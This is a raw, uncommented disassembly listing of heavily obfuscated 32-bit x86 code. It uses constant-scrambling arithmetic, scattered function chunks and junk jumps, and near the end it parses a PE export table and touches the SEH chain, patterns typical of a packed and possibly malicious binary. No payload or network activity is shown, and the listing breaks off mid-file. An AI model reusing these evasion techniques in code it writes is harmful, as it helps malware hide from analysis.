; =============== S U B	R O U T	I N E =======================================



sub_443021	proc near		; DATA XREF: k2vbe3.d:0045562Do

; FUNCTION CHUNK AT 00456910 SIZE 0000000E BYTES

		push	8F6D601Ch
		pop	edi
		xor	edi, 592E63ECh
		rol	edi, 11h
		jnb	loc_456910
sub_443021	endp

; START	OF FUNCTION CHUNK FOR sub_44471B

loc_443036:				; CODE XREF: sub_44471B-33BEj
		jmp	sub_443A95
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
		jnz	loc_43F964
		jmp	loc_44812D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_443046:				; CODE XREF: sub_44D0D5-43A8j
		test	edx, ebx
		jmp	loc_4419E2
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------

loc_44304D:				; CODE XREF: k2vbe3.d:00450193j
		or	ecx, 0D7362F2h
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_443053:				; CODE XREF: sub_4467A1:loc_45017Dj
		or	eax, 806A90C3h
		and	eax, 9AFB4E39h
		xor	eax, 5F6D4F09h
		push	ebx
		pushf
		jmp	loc_44D49A
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_44306C:				; CODE XREF: sub_43F2E0:loc_45780Cj
		xchg	eax, [esp+4+var_4]
		push	esi
		mov	esi, ebx
		xchg	esi, [esp+8+var_8]
		push	7C580A44h
		pop	ebx
		sub	ebx, 0E6EF6C71h
		add	ebx, 6ADD1514h
		jmp	loc_43FF2E
; END OF FUNCTION CHUNK	FOR sub_43F2E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FB9B

loc_44308C:				; CODE XREF: sub_43FB9B:loc_44859Bj
		cmp	ax, 0A5B3h
		jnz	loc_450864
		retn
; END OF FUNCTION CHUNK	FOR sub_43FB9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_443097:				; CODE XREF: sub_44471B-4C08j
		jmp	loc_447B3E
; END OF FUNCTION CHUNK	FOR sub_44471B

; =============== S U B	R O U T	I N E =======================================



sub_44309C	proc near		; CODE XREF: k2vbe3.d:00458C32p

; FUNCTION CHUNK AT 004549ED SIZE 0000000A BYTES

		mov	eax, large fs:0
		jmp	loc_4549ED
sub_44309C	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_419. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_4430A9:				; CODE XREF: sub_454AD4-9FD7j
		jo	loc_449395
		push	2AACA10Bh
		jmp	loc_45493C
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------

loc_4430B9:				; CODE XREF: k2vbe3.d:0045B1F4j
		mov	ecx, [edi]
		ror	esi, 13h
; START	OF FUNCTION CHUNK FOR sub_4517D6

loc_4430BE:				; CODE XREF: sub_4517D6:loc_45B1DEj
		add	eax, 0FDD4B96Fh
		xchg	eax, [esp+4+var_4]
		jmp	loc_44EB2F
; END OF FUNCTION CHUNK	FOR sub_4517D6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_327. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F174

loc_4430CD:				; CODE XREF: sub_44F174:loc_446D12j
		pop	eax
		jge	loc_457B73
		jmp	loc_43C32D
; END OF FUNCTION CHUNK	FOR sub_44F174
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_4430D9:				; CODE XREF: sub_44866A:loc_44C1D3j
					; sub_44CA73+90Dj ...
		jns	loc_450F95
		push	offset loc_45228E
		jmp	nullsub_271
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_4430E9:				; CODE XREF: sub_449372:loc_454C2Cj
		rol	ebx, 5
		jmp	loc_4564D1
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------

loc_4430F1:				; CODE XREF: k2vbe3.d:00444E80j
		jz	loc_43F7A2
		jmp	loc_43D4E4
; ---------------------------------------------------------------------------

loc_4430FC:				; CODE XREF: k2vbe3.d:0044A034j
		rol	eax, 8
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_4430FF:				; CODE XREF: sub_446E24:loc_44A023j
		and	ebx, ds:4000F0h
		sub	ebx, 33ED9290h
		add	ebx, 32110631h
; END OF FUNCTION CHUNK	FOR sub_446E24
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_443111:				; CODE XREF: sub_43F34C:loc_45975Cj
		xchg	ebx, [esp-4+arg_0]
		jmp	sub_459382
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448159

loc_443119:				; CODE XREF: sub_448159:loc_444F45j
		pop	esi
		retn
; END OF FUNCTION CHUNK	FOR sub_448159
; ---------------------------------------------------------------------------

loc_44311B:				; CODE XREF: k2vbe3.d:00455C75j
		jmp	loc_44BC85
; ---------------------------------------------------------------------------

loc_443120:				; CODE XREF: k2vbe3.d:0044AFEDj
		rol	eax, 11h
		push	eax
		push	esi
		mov	esi, ebx
		xchg	esi, [esp]
		push	0ADA686A7h
		jmp	loc_4518D3
; ---------------------------------------------------------------------------

loc_443134:				; CODE XREF: k2vbe3.d:0045A5ACj
		jg	loc_45AC50
		sub	ecx, 2F19D773h
; START	OF FUNCTION CHUNK FOR sub_453347

loc_443140:				; CODE XREF: sub_453347-F2D6j
		add	edx, 6832554Ch
		mov	[edx], eax
		jmp	loc_45B46C
; END OF FUNCTION CHUNK	FOR sub_453347

; =============== S U B	R O U T	I N E =======================================



sub_44314D	proc near		; CODE XREF: sub_457DCA:loc_43E0C3p
					; k2vbe3.d:0044A5C4j

; FUNCTION CHUNK AT 00443BEE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004469B6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459552 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	eax, ebp
		push	edi
		push	0BFB4C6EDh
		pop	edi
		add	edi, 576C855h
		rol	edi, 19h
		jmp	loc_443BEE
sub_44314D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_443168:				; CODE XREF: k2vbe3.d:0043E1CBj
		mov	eax, 74D3CEF9h

; =============== S U B	R O U T	I N E =======================================



sub_44316D	proc near		; CODE XREF: k2vbe3.d:004402BCp

; FUNCTION CHUNK AT 0044212F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444D57 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044C4FE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045794F SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	edx, 0F25CB94Fh
		call	sub_45B20A
		jmp	loc_444D57
sub_44316D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_443180:				; CODE XREF: k2vbe3.d:004561DEj
		jge	loc_443449
		jbe	loc_44EFAA
		jmp	sub_44298D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_443191:				; CODE XREF: sub_44F028:loc_4490D7j
		jge	loc_440800
		xchg	esi, ecx
		xor	ebx, 294374E8h
		jmp	loc_440800
; END OF FUNCTION CHUNK	FOR sub_44F028
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_41. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_4431A5:				; CODE XREF: sub_4580DF-C364j
		test	edx, 2018F5B9h
		jmp	loc_454BA5
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_4431B0:				; CODE XREF: sub_44C1BD-2B6Bj
		jno	loc_43C2A5
		cmp	edx, ebp
		jmp	loc_457811
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_4431BD:				; CODE XREF: sub_44469A:loc_44C58Aj
		test	edx, 40000h
		jmp	loc_448750
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC4A

loc_4431C8:				; CODE XREF: sub_44EC4A:loc_443B72j
		xchg	ebx, [esp+0]
		jmp	loc_4431E0
; END OF FUNCTION CHUNK	FOR sub_44EC4A
; ---------------------------------------------------------------------------
		jmp	ds:off_41E03C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_4431D6:				; CODE XREF: sub_43CCD0+DC36j
		jmp	loc_44403F
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B4F

loc_4431DB:				; CODE XREF: sub_440B4F+7j
		jmp	loc_441A7E
; END OF FUNCTION CHUNK	FOR sub_440B4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC4A

loc_4431E0:				; CODE XREF: sub_43CDCB:loc_43CDD8j
					; sub_44EC4A-BA7Fj ...
		pop	edx
		jz	loc_450DBA
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_457431
; END OF FUNCTION CHUNK	FOR sub_44EC4A

; =============== S U B	R O U T	I N E =======================================



sub_4431F0	proc near		; DATA XREF: k2vbe3.d:loc_43F584o

; FUNCTION CHUNK AT 0044CA68 SIZE 00000005 BYTES

		add	ebx, 0C14DC091h
		xchg	ebx, [esp+0]
		jmp	loc_44CA68
sub_4431F0	endp


; =============== S U B	R O U T	I N E =======================================



sub_4431FE	proc near		; DATA XREF: sub_45B76B+14o

; FUNCTION CHUNK AT 0045915F SIZE 00000026 BYTES

		push	0A597717Dh
		pop	edx
		xor	edx, 43B8B519h
		jnz	loc_45915F
sub_4431FE	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_443210:				; CODE XREF: sub_44D9A7+Cj
		jmp	loc_45641C
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441EBE

loc_443215:				; CODE XREF: sub_441EBE+Dj
		jmp	sub_44ECF3
; END OF FUNCTION CHUNK	FOR sub_441EBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44321A:				; CODE XREF: sub_44C90E-DAA5j
		ja	loc_455290

loc_443220:				; CODE XREF: sub_44C90E:loc_450082j
		cmp	dword ptr [ebp-108h], 43776569h
		jnz	loc_454D1E
; END OF FUNCTION CHUNK	FOR sub_44C90E
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_443230:				; CODE XREF: sub_43FF90-3415j
		jmp	loc_44513E
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------
		mov	[ebx], edi
		jmp	sub_44C310
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_44323C:				; CODE XREF: sub_4460FD:loc_449C03j
		mov	edi, eax
		xchg	edi, [esp+4+var_4]
		jmp	loc_457ADC
; END OF FUNCTION CHUNK	FOR sub_4460FD

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_443246	proc near		; CODE XREF: sub_459DA3j
		push	ebp
		mov	ebp, esp
		push	ecx

loc_44324A:				; CODE XREF: sub_446258:loc_43D56Bj
		mov	esp, ebp
		pop	ebp
		push	offset loc_43D2C8

loc_443252:				; CODE XREF: k2vbe3.d:loc_453AAFj
		jmp	nullsub_343
sub_443246	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_443257:				; CODE XREF: k2vbe3.d:loc_443E1Cj
					; sub_443FC1:loc_44ABC2j
		mov	ds:dword_453D04, eax
		xor	eax, eax
		mov	[ebp-4], eax

loc_443261:				; CODE XREF: sub_443FC1-3B58j
					; sub_440621:loc_441C13j
		jz	loc_43E6EB
		push	8B1DB185h
		pop	eax
		or	eax, 5748387Fh
		jmp	loc_4565AE
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_443278:				; CODE XREF: sub_455C7A:loc_43DD9Bj
		or	eax, 0A8D7AAEDh
		rol	eax, 0Bh
		add	eax, 0A157FB52h
		call	sub_452941

loc_44328C:				; CODE XREF: sub_45AA0B+15j
		jmp	loc_446EC0
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E2A4

loc_443291:				; CODE XREF: sub_44E2A4-88Cj
		jmp	loc_455D87
; END OF FUNCTION CHUNK	FOR sub_44E2A4
; ---------------------------------------------------------------------------

loc_443296:				; CODE XREF: k2vbe3.d:0044B4B4j
		jmp	sub_442D04
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437D3

loc_44329B:				; CODE XREF: sub_4437D3-5792j
		jmp	nullsub_341
; END OF FUNCTION CHUNK	FOR sub_4437D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449006

loc_4432A0:				; CODE XREF: sub_449006+13j
		call	sub_4432B0
		mov	ds:dword_445628, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_449006
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D942

loc_4432AB:				; CODE XREF: sub_43D942+2E68j
		jmp	loc_45A7A5
; END OF FUNCTION CHUNK	FOR sub_43D942

; =============== S U B	R O U T	I N E =======================================



sub_4432B0	proc near		; CODE XREF: sub_449006:loc_4432A0p
					; k2vbe3.d:0044DF5Ap ...

; FUNCTION CHUNK AT 00440346 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044EF31 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004510C9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00452596 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045861A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00459BC4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459C2E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045A531 SIZE 00000009 BYTES

		call	sub_441EBE

loc_4432B5:				; CODE XREF: sub_4487D2+16j
		jmp	loc_44EF31
sub_4432B0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jl	loc_43FF23
		jmp	sub_44680D
; ---------------------------------------------------------------------------

locret_4432C5:				; CODE XREF: k2vbe3.d:0045BFCCj
		retn
; ---------------------------------------------------------------------------

loc_4432C6:				; CODE XREF: k2vbe3.d:00440A51j
		jmp	loc_444DBA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_4432CB:				; CODE XREF: sub_44B912+F069j
		pop	esi
		add	esi, 0F6B928D1h
		or	esi, 45D24F02h
		rol	esi, 0Eh
		add	esi, 9FA8C5D9h
		add	esi, ebp
		jmp	loc_452B6B
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDC1

loc_4432E8:				; CODE XREF: sub_43FDC1+Ej
		jz	loc_443870
		jmp	loc_451BF5
; END OF FUNCTION CHUNK	FOR sub_43FDC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_4432F3:				; CODE XREF: sub_4468FE+B442j
		shl	ecx, 13h
		sbb	eax, 6A321D74h
		mov	[ecx], edi
		shl	ebp, 0Dh

loc_443301:				; CODE XREF: sub_43C927:loc_45359Ej
		call	sub_4436CE
		mov	edx, 0BB931B55h
		push	esi
		jmp	loc_45AE2E
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_443311:				; CODE XREF: sub_44C90E:loc_44E598j
		jl	loc_43F8D3

loc_443317:				; CODE XREF: sub_44E51B+7j
		jmp	loc_43F750
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		xchg	ebp, eax
		jnb	loc_451C38
		pushf
		jmp	loc_43F8D3
; ---------------------------------------------------------------------------
		jnp	loc_459F1F
		jmp	sub_44D022
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_443335:				; CODE XREF: sub_447E07-7B5Bj
		sbb	eax, esi
		sub	eax, edx
		jmp	loc_456AD4
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------

loc_44333E:				; CODE XREF: k2vbe3.d:0043DD63j
		jns	loc_447EC6
		mov	esi, 0F192E5F3h
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_443349:				; CODE XREF: sub_44C90E:loc_43DD54j
		add	eax, 0E1D40C7Eh
		add	eax, ebp
		add	eax, 2EB9FA84h
		push	eax
		jmp	loc_450A0F
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_44335D:				; CODE XREF: k2vbe3.d:0043C103j
		push	eax
		pushf
		push	95AAB1DFh
		pop	eax
		sub	eax, 45C45D00h
		jnb	loc_44EDF1

loc_443371:				; CODE XREF: k2vbe3.d:0044468Aj
		jmp	loc_456D56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44083C

loc_443376:				; CODE XREF: sub_44083C:loc_440852j
		jmp	loc_455554
; END OF FUNCTION CHUNK	FOR sub_44083C
; ---------------------------------------------------------------------------
		push	ecx
		jmp	loc_450951
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45051F

loc_443381:				; CODE XREF: sub_45051F+16j
		push	esi
		push	5B7BA1C5h
		pop	esi

loc_443388:				; CODE XREF: k2vbe3.d:loc_455129j
		add	esi, 89DE6574h
		rol	esi, 5
		and	esi, 976D7017h
		jmp	loc_45BB62
; END OF FUNCTION CHUNK	FOR sub_45051F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44339C:				; CODE XREF: sub_44C90E:loc_4549CAj
		pop	edx
		xor	edx, 0C943859Fh
		rol	edx, 1
		and	edx, 0C52C9977h
		or	edx, 8D0DE7DAh
		jmp	loc_452877
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_4433B6:				; DATA XREF: sub_45ACAE-1D881o
		mov	ecx, ds:dword_43FA7C
		movzx	edx, byte ptr [ecx+edx]
		and	eax, edx
		jz	loc_449C0B
		jmp	loc_450F1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_4433CD:				; CODE XREF: sub_441885:loc_45C22Bj
		xor	edx, ebp
		add	edi, 92D69B6Dh
		jmp	loc_440429
; END OF FUNCTION CHUNK	FOR sub_441885
; ---------------------------------------------------------------------------

locret_4433DA:				; CODE XREF: k2vbe3.d:loc_45214Dj
		retn
; ---------------------------------------------------------------------------

loc_4433DB:				; CODE XREF: k2vbe3.d:0044F925j
		jg	loc_44CEBF
		push	ebx

loc_4433E2:				; CODE XREF: k2vbe3.d:0044C7A8j
		add	edi, 28E500A9h
		xchg	edi, [esp]
		jmp	loc_44E873
; ---------------------------------------------------------------------------

loc_4433F0:				; CODE XREF: k2vbe3.d:00447910j
					; k2vbe3.d:loc_454F0Cj
		xor	eax, eax
		mov	[ebp-0Ch], eax
		lea	eax, [ebp-70h]
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_4433F8:				; CODE XREF: sub_44469A-3AE6j
		push	eax
		jmp	loc_455988
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447C43

loc_4433FE:				; CODE XREF: sub_447C43:loc_44AA82j
		mov	eax, [ebp-8]
		jmp	loc_43ED38
; END OF FUNCTION CHUNK	FOR sub_447C43
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_443406:				; CODE XREF: sub_44BB73+B1A1j
		mov	[edi], ecx

loc_443408:				; CODE XREF: sub_44BB73:loc_450642j
		push	ecx
		push	9FB07FCEh
		pop	ecx
		and	ecx, 0BC3B84ACh
		jmp	loc_43E47F
; END OF FUNCTION CHUNK	FOR sub_44BB73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448417

loc_44341A:				; CODE XREF: sub_448417+Cj
		pop	esi
		or	esi, 50583627h

loc_443421:				; CODE XREF: k2vbe3.d:loc_457CC2j
		xor	esi, 0A0DCF779h
		or	esi, 7F794C31h
		call	sub_451EEA
; END OF FUNCTION CHUNK	FOR sub_448417
; START	OF FUNCTION CHUNK FOR sub_4524D2

loc_443432:				; CODE XREF: sub_4524D2-27B4j
		jmp	loc_4424D8
; END OF FUNCTION CHUNK	FOR sub_4524D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CBB3

loc_443437:				; CODE XREF: sub_44CBB3+19j
		add	eax, 3FE71AA3h
		mov	eax, [eax]
		xchg	eax, [esp+0]
		retn
; END OF FUNCTION CHUNK	FOR sub_44CBB3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_443443:				; CODE XREF: sub_43FE0A+38BFj
		jmp	loc_447EDF
; END OF FUNCTION CHUNK	FOR sub_43FE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_443448:				; CODE XREF: sub_4597AEj
		push	edx

loc_443449:				; CODE XREF: k2vbe3.d:loc_443180j
		mov	edx, ebp
		jmp	loc_451568
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44081A

loc_443450:				; CODE XREF: sub_44081A:loc_43E415j
		mov	eax, [esp+0]
; END OF FUNCTION CHUNK	FOR sub_44081A
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_443453:				; CODE XREF: sub_44DD31:loc_43D047j
					; DATA XREF: zcrshv4o:off_421D68o
		push	edx
		push	edx
		push	0D93341D4h
		pop	edx
		or	edx, 0BDB95477h
		jmp	loc_441F18
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------

loc_443466:				; CODE XREF: k2vbe3.d:0044D8D8j
		push	9A8D07CCh
; START	OF FUNCTION CHUNK FOR sub_456C5F

loc_44346B:				; CODE XREF: sub_456C5F:loc_44D8C8j
		add	eax, 6D8BF04Ch
		call	sub_4553CC
		mov	ds:off_41E124, eax
		jmp	loc_4567D8
; END OF FUNCTION CHUNK	FOR sub_456C5F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_192. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_443482:				; CODE XREF: sub_43C3A9+1941Dj
		jmp	nullsub_189
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_443487:				; CODE XREF: sub_44128B+F6F3j
		jmp	nullsub_220
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
		pop	ecx
		xchg	esi, [esp]
		mov	ebp, esi
		pop	esi
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_443494:				; CODE XREF: sub_4582DD:loc_442C69j
		add	edx, [ebp-4]
		call	sub_4542E1

loc_44349C:				; DATA XREF: sub_456666+35o
		mov	eax, 6
		sub	eax, [ebp-0Ch]
		mov	[ebp-0Ch], eax
		jmp	loc_457852
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_4434AC:				; CODE XREF: sub_456666:loc_45668Bj
		cmp	dword ptr [ebp-1Ch], 66h
		jnz	loc_43CD8F
		mov	eax, 6
		sub	eax, [ebp-0Ch]
		mov	[ebp-0Ch], eax
		jmp	loc_44D60D
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------

loc_4434C6:				; CODE XREF: k2vbe3.d:0044E1F5j
		mov	eax, edx
		xchg	eax, [esp]
		call	sub_446E1E
		push	74F9D465h
		xchg	esi, [esp]
		mov	eax, esi
		pop	esi
		jmp	loc_44A3D3
; ---------------------------------------------------------------------------

loc_4434E0:				; CODE XREF: k2vbe3.d:0044B1F3j
		jle	loc_451C7A
		test	esi, 0BDE55A6h
		jmp	loc_451131
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453E9F

loc_4434F1:				; CODE XREF: sub_453E9F-13673j
		shl	ebp, 1Dh

loc_4434F4:				; CODE XREF: sub_44DAF6:loc_45843Dj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_457798
		jmp	loc_45A37C
; END OF FUNCTION CHUNK	FOR sub_453E9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_443505:				; CODE XREF: sub_44E0F6-E4AEj
		add	edx, 0A084B0B0h
		push	esi
		push	6B257D98h
		pop	esi
		and	esi, 0EB072090h
		jmp	loc_44BF70
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_44351D:				; CODE XREF: sub_44BDBB:loc_44797Dj
		jnz	loc_441A47
		jmp	loc_44E660
; END OF FUNCTION CHUNK	FOR sub_44BDBB

; =============== S U B	R O U T	I N E =======================================



sub_443528	proc near		; CODE XREF: k2vbe3.d:0044648Cp
					; k2vbe3.d:0045B61Ej

; FUNCTION CHUNK AT 0045543B SIZE 00000009 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		jmp	loc_45543B
sub_443528	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_443537:				; CODE XREF: sub_44ED3C:loc_440916j
		pushf
		sbb	ecx, esi
		rol	ecx, 3
		not	ecx
		test	edi, ebx
		jmp	loc_44C3D2
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
		xor	eax, 930B1649h
		rol	eax, 11h
		jmp	loc_452506
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_443554:				; CODE XREF: sub_457D4Bj
		mov	eax, ds:dword_44409C
		or	eax, eax
		jmp	loc_45258B
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
		ror	ebp, 5
		jmp	sub_449CAB
; ---------------------------------------------------------------------------
		popf
		jmp	loc_450A7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_44356F:				; CODE XREF: sub_455C7A+3BDCj
		add	esi, 5E3883B6h
		sub	eax, esi
		pop	esi
		push	edx
		push	0FE8C70Ah
		jmp	loc_44D976
; END OF FUNCTION CHUNK	FOR sub_455C7A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_504. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_443584:				; CODE XREF: k2vbe3.d:0043E8FEj
		jmp	loc_44DCD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_443589:				; CODE XREF: sub_45BE94+3j
		xchg	ebx, [esp+0]
		lea	eax, dword_44BA88
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+4+var_4]
		push	eax
		jmp	loc_448B32
; END OF FUNCTION CHUNK	FOR sub_45BE94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4A2

loc_44359E:				; CODE XREF: sub_45B4A2+4j
		push	82EB1F85h
		jmp	loc_44C2DA
; END OF FUNCTION CHUNK	FOR sub_45B4A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_4435A8:				; CODE XREF: sub_443FC1+125F3j
		push	34E0B798h
		pop	eax

loc_4435AE:				; CODE XREF: sub_457DCA:loc_4447B5j
		add	eax, 0F5F3ABA2h
		rol	eax, 0Dh
		jmp	loc_43DAF7
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
		mov	ebx, 10D3D39Bh
		sbb	eax, ebp
		jmp	sub_458D4F
; ---------------------------------------------------------------------------

loc_4435C8:				; CODE XREF: k2vbe3.d:loc_44B0D8j
		jnz	loc_44C3DD
		jmp	loc_4482B5
; ---------------------------------------------------------------------------
		popf
		add	esi, 0D5C2DE8Fh
		jmp	sub_44F1C4
; ---------------------------------------------------------------------------

loc_4435DF:				; CODE XREF: k2vbe3.d:loc_4492D7j
		mov	eax, 0EA3AEDBCh
		call	sub_451759
		push	esi
		push	0E1420BDAh
		jmp	loc_4473DB
; ---------------------------------------------------------------------------

loc_4435F4:				; DATA XREF: sub_452693:loc_43E599o
		mov	al, [ebp-5]
		call	sub_44F96B
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_4435FC:				; CODE XREF: sub_44866A:loc_445424j
					; sub_43FF90+11988j
		mov	ecx, [ebx+3Ch]
		mov	ecx, [ebx+ecx+78h]
		or	ecx, ecx
		jz	loc_44086E
		jmp	loc_4410EB
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

